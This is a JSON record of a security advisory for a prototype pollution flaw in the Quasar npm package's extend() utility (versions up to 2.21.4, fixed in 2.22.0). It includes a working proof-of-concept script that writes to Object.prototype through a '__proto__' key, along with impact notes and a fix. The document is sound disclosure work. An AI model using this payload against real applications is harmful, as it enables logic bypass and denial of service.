{"id":"GHSA-3r53-75j5-3g7j","title":"Quasar: Prototype pollution in the extend() utility","summary":"Quasar: Prototype pollution in the extend() utility","severity":"medium","cvss":5.6,"cwe":["CWE-1321"],"vendor":"quasar","product":"quasar","ecosystem":"npm","affected":["quasar <= 2.21.4"],"patched":["quasar 2.22.0"],"published":"2026-07-24","updated":"2026-07-24","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-3r53-75j5-3g7j","references":[{"url":"https://github.com/quasarframework/quasar/security/advisories/GHSA-3r53-75j5-3g7j"},{"url":"https://github.com/quasarframework/quasar/commit/d0a95d95ab3c29d13e1b8ba8c5e5025fd6ce35e7"},{"url":"https://github.com/quasarframework/quasar/releases/tag/quasar-v2.22.0"},{"url":"https://github.com/advisories/GHSA-3r53-75j5-3g7j"}],"tags":["ghsa","npm"],"ingestedAt":"2026-07-24T22:40:26.371Z","slug":"GHSA-3r53-75j5-3g7j","body":"## Overview\n\n### Summary\n\n`quasar@2.20.1`, the latest published version at the time of testing, appears to be vulnerable to prototype pollution through the public `extend()` utility exported from the package root.\n\nWhen `extend(true, target, source)` is used for a deep merge, attacker-controlled object keys are recursively copied into the target object without blocking prototype-pollution primitives such as `__proto__`, `constructor`, or `prototype`.\n\nThis can allow attacker-controlled properties to be written to `Object.prototype`.\n\n### Details\n\nAffected source:\n\n```text\nsrc/utils/extend/extend.js\n```\n\nDistributed files include:\n\n```text\ndist/quasar.server.prod.js\ndist/quasar.server.prod.cjs\ndist/quasar.client.js\n```\n\nThe package root publicly exports `extend`. During deep merge, source object keys are recursively assigned into the target object. If the source object contains an own `__proto__` property, the merge can descend into the prototype object and assign attacker-controlled properties onto `Object.prototype`.\n\n### PoC\n\n```bash\nrm -rf /tmp/quasar-extend-pp-poc\nmkdir /tmp/quasar-extend-pp-poc\ncd /tmp/quasar-extend-pp-poc\n\nnpm init -y >/dev/null\nnpm install quasar@2.20.1 vue@3.5.31 >/dev/null\n\ncat > hack.mjs <<'JS'\nimport { extend } from 'quasar';\n\ndelete Object.prototype.polluted;\n\nextend(true, {}, {\n  ['__proto__']: {\n    polluted: 'yes'\n  }\n});\n\nconsole.log(({}).polluted);\n\ndelete Object.prototype.polluted;\nJS\n\nnode ./hack.mjs\n```\n\nObserved output:\n\n```text\nyes\n```\n\nExpected output:\n\n```text\nundefined\n```\n\n### Impact\n\nThis is a prototype pollution vulnerability.\n\nIf an application passes user-controlled or partially user-controlled objects into `extend(true, ...)`, an attacker may be able to pollute `Object.prototype` in the same JavaScript process.\n\nDepending on how the polluted property is later consumed, this may lead to logic bypass, unsafe default option injection, denial of service, or other application-specific security impact.\n\n### Suggested Fix\n\nReject or safely ignore dangerous keys before assignment, including:\n\n```text\n__proto__\nprototype\nconstructor\n```\n\nThe merge implementation should also avoid descending into prototype-related properties during recursive merge.\n\n## Affected packages\n\n- `quasar <= 2.21.4`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `quasar 2.22.0`","depth":"sunlit","depthScore":31,"depthScoreParts":{"impact":30.8,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}